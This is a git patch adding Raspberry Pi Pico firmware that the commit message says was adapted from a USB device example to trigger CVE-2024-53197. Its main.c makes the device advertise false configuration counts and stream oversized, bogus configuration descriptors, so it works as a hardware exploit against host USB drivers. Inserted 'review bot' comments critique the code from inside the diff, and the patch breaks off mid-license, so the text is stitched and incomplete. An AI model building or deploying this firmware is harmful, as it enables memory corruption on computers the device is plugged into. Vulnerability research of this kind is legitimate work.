From d689dc008db009bec68f74e16a5b5aeccfce9d17 Mon Sep 17 00:00:00 2001 From: itycodes Date: Sat, 19 Apr 2025 21:13:45 +0200 Subject: [PATCH] Initial commit I include the shell env files that point to my home dir for my own convenience. Otherwise, this uses the Pico SDK, with the setup based on their repo's README. I don't actually properly config picotool or anything, so this thing compiles a (limited version of it) itself. The code is based on https://github.com/raspberrypi/pico-examples/blob/master/usb/device/dev_lowlevel/dev_lowlevel.c which was hacked to trigger CVE-2024-53197. The code desperately needs cleaning.
---
CMakeLists.txt | 23 ++ main.c | 901 ++++++++++++++++++++++++++++++++++++++++++ pico_sdk_import.cmake | 121 ++++++ sdk.env | 1 + sdk.nu | 1 + 5 files changed, 1047 insertions(+) create mode 100644 CMakeLists.txt create mode 100644 main.c create mode 100644 pico_sdk_import.cmake create mode 100644 sdk.env create mode 100644 sdk.nu
diff --git a/CMakeLists.txt b/CMakeLists.txt
new file mode 100644
index 0000000..28f74d7
--- /dev/null
+++ b/CMakeLists.txt
@@ -0,0 +1,23 @@
+cmake_minimum_required(VERSION 4.0)
+
+# initialize the SDK based on PICO_SDK_PATH
+# note: this must happen before project()
+include(pico_sdk_import.cmake)
+
+project(my_project)
+
+# initialize the Raspberry Pi Pico SDK
+pico_sdk_init()
+
+
+# rest of your project
+add_executable(main
+ main.c
+)
+
+target_compile_definitions(main PRIVATE PICO_STDIO_USB_CONNECT_WAIT_TIMEOUT_MS=5000)
+
+# Add pico_stdlib library which aggregates commonly used features
+target_link_libraries(main PRIVATE pico_stdlib hardware_resets hardware_irq)
+# create map/bin/hex/uf2 file in addition to ELF.
+pico_add_extra_outputs(main)
diff --git a/main.c b/main.c
new file mode 100644
index 0000000..3779281
--- /dev/null
+++ b/main.c
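Review bot: `cmake_minimum_required(VERSION 4.0)` in CMakeLists.txt rejects every CMake release older than 4.0, yet nothing in this file appears to use a 4.0-only feature, and the bundled pico_sdk_import.cmake still carries a branch for CMake older than 3.17. A version range keeps the newer policy defaults without locking out distribution packages: `cmake_minimum_required(VERSION 3.13...4.0)`. The 3.13 lower bound is what I recall from the SDK README, so confirm it against the SDK release in use. `project(my_project)` is also still the template placeholder name.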
@@ -0,0 +1,901 @@ +/** + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. + * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#include + +// Pico +#include "pico/stdlib.h" + +// For memcpy +#include + +// Include descriptor struct definitions +/* + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. + * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#ifndef _USB_COMMON_H +#define _USB_COMMON_H + +#include "pico/types.h" +#include "hardware/structs/usb.h" + +// bmRequestType bit definitions +#define USB_REQ_TYPE_STANDARD 0x00u +#define USB_REQ_TYPE_TYPE_MASK 0x60u +#define USB_REQ_TYPE_TYPE_CLASS 0x20u +#define USB_REQ_TYPE_TYPE_VENDOR 0x40u + +#define USB_REQ_TYPE_RECIPIENT_MASK 0x1fu +#define USB_REQ_TYPE_RECIPIENT_DEVICE 0x00u +#define USB_REQ_TYPE_RECIPIENT_INTERFACE 0x01u +#define USB_REQ_TYPE_RECIPIENT_ENDPOINT 0x02u + +#define USB_DIR_OUT 0x00u +#define USB_DIR_IN 0x80u + +#define USB_TRANSFER_TYPE_CONTROL 0x0 +#define USB_TRANSFER_TYPE_ISOCHRONOUS 0x1 +#define USB_TRANSFER_TYPE_BULK 0x2 +#define USB_TRANSFER_TYPE_INTERRUPT 0x3 +#define USB_TRANSFER_TYPE_BITS 0x3 + +// Descriptor types +#define USB_DT_DEVICE 0x01 +#define USB_DT_CONFIG 0x02 +#define USB_DT_STRING 0x03 +#define USB_DT_INTERFACE 0x04 +#define USB_DT_ENDPOINT 0x05 + +#define USB_REQUEST_GET_STATUS 0x0 +#define USB_REQUEST_CLEAR_FEATURE 0x01 +#define USB_REQUEST_SET_FEATURE 0x03 +#define USB_REQUEST_SET_ADDRESS 0x05 +#define USB_REQUEST_GET_DESCRIPTOR 0x06 +#define USB_REQUEST_SET_DESCRIPTOR 0x07 +#define USB_REQUEST_GET_CONFIGURATION 0x08 +#define USB_REQUEST_SET_CONFIGURATION 0x09 +#define USB_REQUEST_GET_INTERFACE 0x0a +#define USB_REQUEST_SET_INTERFACE 0x0b +#define USB_REQUEST_SYNC_FRAME 0x0c + +#define USB_REQUEST_MSC_GET_MAX_LUN 0xfe +#define USB_REQUEST_MSC_RESET 0xff + +#define USB_FEAT_ENDPOINT_HALT 0x00 +#define USB_FEAT_DEVICE_REMOTE_WAKEUP 0x01 +#define USB_FEAT_TEST_MODE 0x02 + +#define USB_DESCRIPTOR_TYPE_ENDPOINT 0x05 + +struct usb_setup_packet { + uint8_t bmRequestType; + 
uint8_t bRequest; + uint16_t wValue; + uint16_t wIndex; + uint16_t wLength; +} __packed; + +struct usb_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; +}; + +struct usb_device_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint16_t bcdUSB; + uint8_t bDeviceClass; + uint8_t bDeviceSubClass; + uint8_t bDeviceProtocol; + uint8_t bMaxPacketSize0; + uint16_t idVendor; + uint16_t idProduct; + uint16_t bcdDevice; + uint8_t iManufacturer; + uint8_t iProduct; + uint8_t iSerialNumber; + uint8_t bNumConfigurations; +} __packed; + +struct usb_configuration_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint16_t wTotalLength; + uint8_t bNumInterfaces; + uint8_t bConfigurationValue; + uint8_t iConfiguration; + uint8_t bmAttributes; + uint8_t bMaxPower; +} __packed; + +struct usb_interface_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bInterfaceNumber; + uint8_t bAlternateSetting; + uint8_t bNumEndpoints; + uint8_t bInterfaceClass; + uint8_t bInterfaceSubClass; + uint8_t bInterfaceProtocol; + uint8_t iInterface; +} __packed; + +struct usb_endpoint_descriptor { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bEndpointAddress; + uint8_t bmAttributes; + uint16_t wMaxPacketSize; + uint8_t bInterval; +} __packed; + +struct usb_endpoint_descriptor_long { + uint8_t bLength; + uint8_t bDescriptorType; + uint8_t bEndpointAddress; + uint8_t bmAttributes; + uint16_t wMaxPacketSize; + uint8_t bInterval; + uint8_t bRefresh; + uint8_t bSyncAddr; +} __attribute__((packed)); + +#endif +// USB register definitions from pico-sdk +#include "hardware/regs/usb.h" +// USB hardware struct definitions from pico-sdk +#include "hardware/structs/usb.h" +// For interrupt enable and numbers +#include "hardware/irq.h" +// For resetting the USB controller +#include "hardware/resets.h" + +/** + * Copyright (c) 2020 Raspberry Pi (Trading) Ltd. 
+ * + * SPDX-License-Identifier: BSD-3-Clause + */ + +#ifndef DEV_LOWLEVEL_H_ +#define DEV_LOWLEVEL_H_ + +typedef void (*usb_ep_handler)(uint8_t *buf, uint16_t len); + +// Struct in which we keep the endpoint configuration +struct usb_endpoint_configuration { + const struct usb_endpoint_descriptor *descriptor; + usb_ep_handler handler; + + // Pointers to endpoint + buffer control registers + // in the USB controller DPSRAM + volatile uint32_t *endpoint_control; + volatile uint32_t *buffer_control; + volatile uint8_t *data_buffer; + + // Toggle after each packet (unless replying to a SETUP) + uint8_t next_pid; +}; + +// Struct in which we keep the device configuration +struct usb_device_configuration { + struct usb_device_descriptor *device_descriptor; + const struct usb_interface_descriptor *interface_descriptor; + const struct usb_configuration_descriptor *config_descriptor; + const unsigned char *lang_descriptor; + const unsigned char **descriptor_strings; + // USB num endpoints is 16 + struct usb_endpoint_configuration endpoints[USB_NUM_ENDPOINTS]; +}; + +#define EP0_IN_ADDR (USB_DIR_IN | 0) +#define EP0_OUT_ADDR (USB_DIR_OUT | 0) +#define EP1_OUT_ADDR (USB_DIR_OUT | 1) +#define EP2_IN_ADDR (USB_DIR_IN | 2) + +// EP0 IN and OUT +static const struct usb_endpoint_descriptor ep0_out = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP0_OUT_ADDR, // EP number 0, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_CONTROL, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_endpoint_descriptor ep0_in = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP0_IN_ADDR, // EP number 0, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_CONTROL, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +// Descriptors +static struct usb_device_descriptor device_descriptor = { + .bLength = sizeof(struct 
usb_device_descriptor), + .bDescriptorType = USB_DT_DEVICE, + .bcdUSB = 0x0110, // USB 1.1 device + .bDeviceClass = 0, // Specified in interface descriptor + .bDeviceSubClass = 0, // No subclass + .bDeviceProtocol = 0, // No protocol + .bMaxPacketSize0 = 64, // Max packet size for ep0 + .idVendor = 0x0dba, // Your vendor id + .idProduct = 0x3000, // Your product ID + .bcdDevice = 0, // No device revision number + .iManufacturer = 1, // Manufacturer string index + .iProduct = 2, // Product string index + .iSerialNumber = 0, // No serial number + .bNumConfigurations = 1 // One configuration +}; + +static const struct usb_interface_descriptor interface_descriptor = { + .bLength = sizeof(struct usb_interface_descriptor), + .bDescriptorType = USB_DT_INTERFACE, + .bInterfaceNumber = 0, + .bAlternateSetting = 0, + .bNumEndpoints = 2, // Interface has 2 endpoints + .bInterfaceClass = 1, // Vendor specific endpoint + .bInterfaceSubClass = 1, + .bInterfaceProtocol = 0, + .iInterface = 0 +}; + +static const struct usb_endpoint_descriptor ep1_out = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP1_OUT_ADDR, // EP number 1, OUT from host (rx to device) + .bmAttributes = USB_TRANSFER_TYPE_BULK, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_endpoint_descriptor ep2_in = { + .bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DT_ENDPOINT, + .bEndpointAddress = EP2_IN_ADDR, // EP number 2, IN from host (tx from device) + .bmAttributes = USB_TRANSFER_TYPE_BULK, + .wMaxPacketSize = 64, + .bInterval = 0 +}; + +static const struct usb_configuration_descriptor config_descriptor = { + .bLength = sizeof(struct usb_configuration_descriptor), + .bDescriptorType = USB_DT_CONFIG, + .wTotalLength = 646, + .bNumInterfaces = 1, + .bConfigurationValue = 1, // Configuration 1 + .iConfiguration = 0, // No string + .bmAttributes = 0xc0, // attributes: self powered, no remote wakeup + 
.bMaxPower = 0x32 // 100ma +}; + +static const unsigned char lang_descriptor[] = { + 8, // bLength + 0x03, // bDescriptorType == String Descriptor + 0x09, 0x04, // language id = us english + +}; + +static const unsigned char *descriptor_strings[] = { + (unsigned char *) "Raspberry Pi", // Vendor + (unsigned char *) "Pico Test Device" // Product +}; + +#endif + +#define usb_hw_set ((usb_hw_t *)hw_set_alias_untyped(usb_hw)) +#define usb_hw_clear ((usb_hw_t *)hw_clear_alias_untyped(usb_hw)) + +// Function prototypes for our device specific endpoint handlers defined +// later on +void ep0_in_handler(uint8_t *buf, uint16_t len); +void ep0_out_handler(uint8_t *buf, uint16_t len); +void ep1_out_handler(uint8_t *buf, uint16_t len); +void ep2_in_handler(uint8_t *buf, uint16_t len); + +// Global device address +static bool should_set_address = false; +static uint8_t dev_addr = 0; +static volatile bool configured = false; + +// Global data buffer for EP0 +static uint8_t ep0_buf[1024]; + +// Struct defining the device configuration +static struct usb_device_configuration dev_config = { + .device_descriptor = &device_descriptor, + .interface_descriptor = &interface_descriptor, + .config_descriptor = &config_descriptor, + .lang_descriptor = lang_descriptor, + .descriptor_strings = descriptor_strings, + .endpoints = { + { + .descriptor = &ep0_out, + .handler = &ep0_out_handler, + .endpoint_control = NULL, // NA for EP0 + .buffer_control = &usb_dpram->ep_buf_ctrl[0].out, + // EP0 in and out share a data buffer + .data_buffer = &usb_dpram->ep0_buf_a[0], + }, + { + .descriptor = &ep0_in, + .handler = &ep0_in_handler, + .endpoint_control = NULL, // NA for EP0, + .buffer_control = &usb_dpram->ep_buf_ctrl[0].in, + // EP0 in and out share a data buffer + .data_buffer = &usb_dpram->ep0_buf_a[0], + }, + { + .descriptor = &ep1_out, + .handler = &ep1_out_handler, + // EP1 starts at offset 0 for endpoint control + .endpoint_control = &usb_dpram->ep_ctrl[0].out, + .buffer_control = 
&usb_dpram->ep_buf_ctrl[1].out, + // First free EPX buffer + .data_buffer = &usb_dpram->epx_data[0 * 64], + }, + { + .descriptor = &ep2_in, + .handler = &ep2_in_handler, + .endpoint_control = &usb_dpram->ep_ctrl[1].in, + .buffer_control = &usb_dpram->ep_buf_ctrl[2].in, + // Second free EPX buffer + .data_buffer = &usb_dpram->epx_data[1 * 64], + } + } +}; + +/** + * @brief Given an endpoint address, return the usb_endpoint_configuration of that endpoint. Returns NULL + * if an endpoint of that address is not found. + * + * @param addr + * @return struct usb_endpoint_configuration* + */ +struct usb_endpoint_configuration *usb_get_endpoint_configuration(uint8_t addr) { + struct usb_endpoint_configuration *endpoints = dev_config.endpoints; + for (int i = 0; i < USB_NUM_ENDPOINTS; i++) { + if (endpoints[i].descriptor && (endpoints[i].descriptor->bEndpointAddress == addr)) { + return &endpoints[i]; + } + } + return NULL; +} + +/** + * @brief Given a C string, fill the EP0 data buf with a USB string descriptor for that string. + * + * @param C string you would like to send to the USB host + * @return the length of the string descriptor in EP0 buf + */ +uint8_t usb_prepare_string_descriptor(const unsigned char *str) { + // 2 for bLength + bDescriptorType + strlen * 2 because string is unicode. i.e. other byte will be 0 + uint8_t bLength = 2 + (strlen((const char *)str) * 2); + static const uint8_t bDescriptorType = 0x03; + + volatile uint8_t *buf = &ep0_buf[0]; + *buf++ = bLength; + *buf++ = bDescriptorType; + + uint8_t c; + + do { + c = *str++; + *buf++ = c; + *buf++ = 0; + } while (c != '\0'); + + return bLength; +} + +/** + * @brief Take a buffer pointer located in the USB RAM and return as an offset of the RAM. + * + * @param buf + * @return uint32_t + */ +static inline uint32_t usb_buffer_offset(volatile uint8_t *buf) { + return (uint32_t) buf ^ (uint32_t) usb_dpram; +} + +/** + * @brief Set up the endpoint control register for an endpoint (if applicable. 
Not valid for EP0). + * + * @param ep + */ +void usb_setup_endpoint(const struct usb_endpoint_configuration *ep) { + printf("Set up endpoint 0x%x with buffer address 0x%p\n", ep->descriptor->bEndpointAddress, ep->data_buffer); + + // EP0 doesn't have one so return if that is the case + if (!ep->endpoint_control) { + return; + } + + // Get the data buffer as an offset of the USB controller's DPRAM + uint32_t dpram_offset = usb_buffer_offset(ep->data_buffer); + uint32_t reg = EP_CTRL_ENABLE_BITS + | EP_CTRL_INTERRUPT_PER_BUFFER + | (ep->descriptor->bmAttributes << EP_CTRL_BUFFER_TYPE_LSB) + | dpram_offset; + *ep->endpoint_control = reg; +} + +/** + * @brief Set up the endpoint control register for each endpoint. + * + */ +void usb_setup_endpoints() { + const struct usb_endpoint_configuration *endpoints = dev_config.endpoints; + for (int i = 0; i < USB_NUM_ENDPOINTS; i++) { + if (endpoints[i].descriptor && endpoints[i].handler) { + usb_setup_endpoint(&endpoints[i]); + } + } +} + +/** + * @brief Set up the USB controller in device mode, clearing any previous state. + * + */ +void usb_device_init() { + // Reset usb controller + reset_unreset_block_num_wait_blocking(RESET_USBCTRL); + + // Clear any previous state in dpram just in case + memset(usb_dpram, 0, sizeof(*usb_dpram)); // <1> + + // Enable USB interrupt at processor + irq_set_enabled(USBCTRL_IRQ, true); + + // Mux the controller to the onboard usb phy + usb_hw->muxing = USB_USB_MUXING_TO_PHY_BITS | USB_USB_MUXING_SOFTCON_BITS; + + // Force VBUS detect so the device thinks it is plugged into a host + usb_hw->pwr = USB_USB_PWR_VBUS_DETECT_BITS | USB_USB_PWR_VBUS_DETECT_OVERRIDE_EN_BITS; + + // Enable the USB controller in device mode. 
+ usb_hw->main_ctrl = USB_MAIN_CTRL_CONTROLLER_EN_BITS; + + // Enable an interrupt per EP0 transaction + usb_hw->sie_ctrl = USB_SIE_CTRL_EP0_INT_1BUF_BITS; // <2> + + // Enable interrupts for when a buffer is done, when the bus is reset, + // and when a setup packet is received + usb_hw->inte = USB_INTS_BUFF_STATUS_BITS | + USB_INTS_BUS_RESET_BITS | + USB_INTS_SETUP_REQ_BITS; + + // Set up endpoints (endpoint control registers) + // described by device configuration + usb_setup_endpoints(); + + // Present full speed device by enabling pull up on DP + usb_hw_set->sie_ctrl = USB_SIE_CTRL_PULLUP_EN_BITS; +} + +/** + * @brief Given an endpoint configuration, returns true if the endpoint + * is transmitting data to the host (i.e. is an IN endpoint) + * + * @param ep, the endpoint configuration + * @return true + * @return false + */ +static inline bool ep_is_tx(struct usb_endpoint_configuration *ep) { + return ep->descriptor->bEndpointAddress & USB_DIR_IN; +} + +/** + * @brief Starts a transfer on a given endpoint. + * + * @param ep, the endpoint configuration. + * @param buf, the data buffer to send. Only applicable if the endpoint is TX + * @param len, the length of the data in buf (this example limits max len to one packet - 64 bytes) + */ +void usb_start_transfer(struct usb_endpoint_configuration *ep, uint8_t *buf, uint16_t len) { + // We are asserting that the length is <= 64 bytes for simplicity of the example. + // For multi packet transfers see the tinyusb port. + assert(len <= 64); + + printf("Start transfer of len %d on ep addr 0x%x\n", len, ep->descriptor->bEndpointAddress); + + // Prepare buffer control register value + uint32_t val = len | USB_BUF_CTRL_AVAIL; + + if (ep_is_tx(ep)) { + // Need to copy the data from the user buffer to the usb memory + memcpy((void *) ep->data_buffer, (void *) buf, len); + // Mark as full + val |= USB_BUF_CTRL_FULL; + } + + // Set pid and flip for next transfer + val |= ep->next_pid ? 
USB_BUF_CTRL_DATA1_PID : USB_BUF_CTRL_DATA0_PID; + ep->next_pid ^= 1u; + + *ep->buffer_control = val; +} + +uint8_t transfered_reset = 0x0; + +/** + * @brief Send device descriptor to host + * + */ +void usb_handle_device_descriptor(volatile struct usb_setup_packet *pkt) { + struct usb_device_descriptor *d = dev_config.device_descriptor; + if(transfered_reset) { + d->bNumConfigurations = 8; + } + // EP0 in + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP0_IN_ADDR); + // Always respond with pid 1 + ep->next_pid = 1; + usb_start_transfer(ep, (uint8_t *) d, MIN(sizeof(struct usb_device_descriptor), pkt->wLength)); +} + +uint8_t ran = 0; + +uint8_t in_transfer = 0; + + +/** + * @brief Send the configuration descriptor (and potentially the configuration and endpoint descriptors) to the host. + * + * @param pkt, the setup packet received from the host. + */ +void usb_handle_config_descriptor(volatile struct usb_setup_packet *pkt) { + uint8_t *buf = &ep0_buf[0]; + // If we more than just the config descriptor copy it all + if (pkt->wLength >= 64 && in_transfer == 0) { + // First request will want just the config descriptor + const struct usb_configuration_descriptor *d = dev_config.config_descriptor; + memcpy((void *) buf, d, sizeof(struct usb_configuration_descriptor)); + buf += sizeof(struct usb_configuration_descriptor); + memcpy((void *) buf, dev_config.interface_descriptor, sizeof(struct usb_interface_descriptor)); + buf += sizeof(struct usb_interface_descriptor); + const struct usb_endpoint_configuration *ep = dev_config.endpoints; + + // Copy all the endpoint descriptors starting from EP1 + for (uint i = 2; i < USB_NUM_ENDPOINTS; i++) { + if (ep[i].descriptor) { + memcpy((void *) buf, ep[i].descriptor, sizeof(struct usb_endpoint_descriptor)); + buf += sizeof(struct usb_endpoint_descriptor); + } + } + if(transfered_reset) { + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + 
usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], len); + return; + } + if(1) { + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + const uint8_t siz = 64-len; + memset(buf, 0, siz); + buf[0] = siz; + buf[1] = 0xFF & pkt->wLength; + buf += siz; + } + ran += 1; + in_transfer = 1; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], 64); + uint16_t size = 646; + for(int i = 0; i < 9; i++) { + memset(buf, 0, 64); + buf[0] = 64; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 64); + } + const uint8_t len = size % 64; + memset(buf, 0, len); + buf[0] = len; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, len); + } else if(in_transfer && pkt->wLength >= 64) { + memset(buf, 0, 64); + buf[0] = 64; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 64); + } else if(in_transfer) { + in_transfer = 0; + memset(buf, 0, 9); + buf[0] = 9; + buf[1] = 0xA7; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), buf, 9); + } else { + const struct usb_configuration_descriptor *d = dev_config.config_descriptor; + memcpy((void *) buf, d, sizeof(struct usb_configuration_descriptor)); + buf += sizeof(struct usb_configuration_descriptor); + uint32_t len = (uint32_t) buf - (uint32_t) &ep0_buf[0]; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], len); + } +} + +/** + * @brief Handle a BUS RESET from the host by setting the device address back to 0. + * + */ +void usb_bus_reset(void) { + // Set address back to 0 + dev_addr = 0; + should_set_address = false; + usb_hw->dev_addr_ctrl = 0; + configured = false; +} + +/** + * @brief Send the requested string descriptor to the host. + * + * @param pkt, the setup packet from the host. 
+ */ +void usb_handle_string_descriptor(volatile struct usb_setup_packet *pkt) { + uint8_t i = pkt->wValue & 0xff; + uint8_t len = 0; + + if (i == 0) { + len = 4; + memcpy(&ep0_buf[0], dev_config.lang_descriptor, len); + } else { + // Prepare fills in ep0_buf + len = usb_prepare_string_descriptor(dev_config.descriptor_strings[i - 1]); + } + + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], MIN(len, pkt->wLength)); +} + +/** + * @brief Sends a zero length status packet back to the host. + */ +void usb_acknowledge_out_request(void) { + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), NULL, 0); +} + +/** + * @brief Handles a SET_ADDR request from the host. The actual setting of the device address in + * hardware is done in ep0_in_handler. This is because we have to acknowledge the request first + * as a device with address zero. + * + * @param pkt, the setup packet from the host. + */ +void usb_set_device_address(volatile struct usb_setup_packet *pkt) { + // Set address is a bit of a strange case because we have to send a 0 length status packet first with + // address 0 + dev_addr = (pkt->wValue & 0xff); + printf("Set address %d\r\n", dev_addr); + // Will set address in the callback phase + should_set_address = true; + usb_acknowledge_out_request(); +} + +/** + * @brief Handles a SET_CONFIGRUATION request from the host. Assumes one configuration so simply + * sends a zero length status packet back to the host. + * + * @param pkt, the setup packet from the host. + */ +void usb_set_device_configuration(__unused volatile struct usb_setup_packet *pkt) { + // Only one configuration so just acknowledge the request + printf("Device Enumerated\r\n"); + usb_acknowledge_out_request(); + configured = true; +} + + +/** + * @brief Respond to a setup packet from the host. 
+ * + */ +void usb_handle_setup_packet(void) { + volatile struct usb_setup_packet *pkt = (volatile struct usb_setup_packet *) &usb_dpram->setup_packet; + uint8_t req_direction = pkt->bmRequestType; + uint8_t req = pkt->bRequest; + + // Reset PID to 1 for EP0 IN + usb_get_endpoint_configuration(EP0_IN_ADDR)->next_pid = 1u; + + if ((req_direction & 0x80) == USB_DIR_OUT) { + if (req == USB_REQUEST_SET_ADDRESS) { + usb_set_device_address(pkt); + } else if (req == USB_REQUEST_SET_CONFIGURATION) { + usb_set_device_configuration(pkt); + } else { + usb_acknowledge_out_request(); + printf("Other OUT request (0x%x)\r\n", pkt->bRequest); + } + } else if ((req_direction & 0x80) == USB_DIR_IN) { + if (req == USB_REQUEST_GET_DESCRIPTOR) { + uint16_t descriptor_type = pkt->wValue >> 8; + + switch (descriptor_type) { + case USB_DT_DEVICE: + usb_handle_device_descriptor(pkt); + printf("GET DEVICE DESCRIPTOR\r\n"); + break; + + case USB_DT_CONFIG: + usb_handle_config_descriptor(pkt); + printf("GET CONFIG DESCRIPTOR\r\n"); + break; + + case USB_DT_STRING: + usb_handle_string_descriptor(pkt); + printf("GET STRING DESCRIPTOR\r\n"); + break; + + default: + printf("Unhandled GET_DESCRIPTOR type 0x%x\r\n", descriptor_type); + } + } else if (req = 0x85 && !transfered_reset) { + memset(&ep0_buf[0], 0, 12); + ep0_buf[0] = 0x02; + usb_start_transfer(usb_get_endpoint_configuration(EP0_IN_ADDR), &ep0_buf[0], 12); + transfered_reset = 0x01; + } + + else { + printf("Other IN request (0x%x)\r\n", pkt->bRequest); + } + } +} + +/** + * @brief Notify an endpoint that a transfer has completed. + * + * @param ep, the endpoint to notify. 
+ */ +static void usb_handle_ep_buff_done(struct usb_endpoint_configuration *ep) { + uint32_t buffer_control = *ep->buffer_control; + // Get the transfer length for this endpoint + uint16_t len = buffer_control & USB_BUF_CTRL_LEN_MASK; + + // Call that endpoints buffer done handler + ep->handler((uint8_t *) ep->data_buffer, len); +} + +/** + * @brief Find the endpoint configuration for a specified endpoint number and + * direction and notify it that a transfer has completed. + * + * @param ep_num + * @param in + */ +static void usb_handle_buff_done(uint ep_num, bool in) { + uint8_t ep_addr = ep_num | (in ? USB_DIR_IN : 0); + printf("EP %d (in = %d) done\n", ep_num, in); + for (uint i = 0; i < USB_NUM_ENDPOINTS; i++) { + struct usb_endpoint_configuration *ep = &dev_config.endpoints[i]; + if (ep->descriptor && ep->handler) { + if (ep->descriptor->bEndpointAddress == ep_addr) { + usb_handle_ep_buff_done(ep); + return; + } + } + } +} + +/** + * @brief Handle a "buffer status" irq. This means that one or more + * buffers have been sent / received. Notify each endpoint where this + * is the case. 
+ */ +static void usb_handle_buff_status() { + uint32_t buffers = usb_hw->buf_status; + uint32_t remaining_buffers = buffers; + + uint bit = 1u; + for (uint i = 0; remaining_buffers && i < USB_NUM_ENDPOINTS * 2; i++) { + if (remaining_buffers & bit) { + // clear this in advance + usb_hw_clear->buf_status = bit; + // IN transfer for even i, OUT transfer for odd i + usb_handle_buff_done(i >> 1u, !(i & 1u)); + remaining_buffers &= ~bit; + } + bit <<= 1u; + } +} + +/** + * @brief USB interrupt handler + * + */ +#ifdef __cplusplus +extern "C" { +#endif +/// \tag::isr_setup_packet[] +void isr_usbctrl(void) { + // USB interrupt handler + uint32_t status = usb_hw->ints; + uint32_t handled = 0; + + // Setup packet received + if (status & USB_INTS_SETUP_REQ_BITS) { + handled |= USB_INTS_SETUP_REQ_BITS; + usb_hw_clear->sie_status = USB_SIE_STATUS_SETUP_REC_BITS; + usb_handle_setup_packet(); + } +/// \end::isr_setup_packet[] + + // Buffer status, one or more buffers have completed + if (status & USB_INTS_BUFF_STATUS_BITS) { + handled |= USB_INTS_BUFF_STATUS_BITS; + usb_handle_buff_status(); + } + + // Bus is reset + if (status & USB_INTS_BUS_RESET_BITS) { + printf("BUS RESET\n"); + handled |= USB_INTS_BUS_RESET_BITS; + usb_hw_clear->sie_status = USB_SIE_STATUS_BUS_RESET_BITS; + usb_bus_reset(); + } + + if (status ^ handled) { + panic("Unhandled IRQ 0x%x\n", (uint) (status ^ handled)); + } +} +#ifdef __cplusplus +} +#endif + +/** + * @brief EP0 in transfer complete. Either finish the SET_ADDRESS process, or receive a zero + * length status packet from the host. 
+ * + * @param buf the data that was sent + * @param len the length that was sent + */ +void ep0_in_handler(__unused uint8_t *buf, __unused uint16_t len) { + if (should_set_address) { + // Set actual device address in hardware + usb_hw->dev_addr_ctrl = dev_addr; + should_set_address = false; + } else { + // Receive a zero length status packet from the host on EP0 OUT + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP0_OUT_ADDR); + usb_start_transfer(ep, NULL, 0); + } +} + +void ep0_out_handler(__unused uint8_t *buf, __unused uint16_t len) { +} + +// Device specific functions +void ep1_out_handler(uint8_t *buf, uint16_t len) { + printf("RX %d bytes from host\n", len); + // Send data back to host + struct usb_endpoint_configuration *ep = usb_get_endpoint_configuration(EP2_IN_ADDR); + usb_start_transfer(ep, buf, len); +} + +void ep2_in_handler(__unused uint8_t *buf, uint16_t len) { + printf("Sent %d bytes to host\n", len); + // Get ready to rx again from host + usb_start_transfer(usb_get_endpoint_configuration(EP1_OUT_ADDR), NULL, 64); +} + +int main(void) { + stdio_init_all(); + printf("USB Device Low-Level hardware example\n"); + usb_device_init(); + + // Wait until configured + while (!configured) { + tight_loop_contents(); + } + + // Get ready to rx from host + usb_start_transfer(usb_get_endpoint_configuration(EP1_OUT_ADDR), NULL, 64); + + // Everything is interrupt driven so just loop here + while (1) { + tight_loop_contents(); + } +} diff --git a/pico_sdk_import.cmake b/pico_sdk_import.cmake new file mode 100644 index 0000000..d493cc2 --- /dev/null +++ b/pico_sdk_import.cmake 
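Review bot: In `usb_handle_setup_packet` of main.c, the condition `else if (req = 0x85 && !transfered_reset)` assigns to `req` instead of comparing it, so while `transfered_reset` is 0 the branch runs for every IN request other than GET_DESCRIPTOR and the "Other IN request" log below it is not reached; it should read `else if (req == 0x85 && !transfered_reset)`. Building with `-Wall` should flag this form. Separately, `usb_handle_string_descriptor` indexes `dev_config.descriptor_strings[i - 1]` with `i` taken from the host's `wValue` and no bound check, while the table holds two entries, so a string index above 2 reads past the array. Rejecting indexes larger than the table size before the lookup would close that.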
@@ -0,0 +1,121 @@
+# This is a copy of /external/pico_sdk_import.cmake
+
+# This can be dropped into an external project to help locate this SDK
+# It should be include()ed prior to project()
+
+# Copyright 2020 (c) 2020 Raspberry Pi (Trading) Ltd.
+#
+# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
+# following conditions are met:
+#
+# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
+# disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
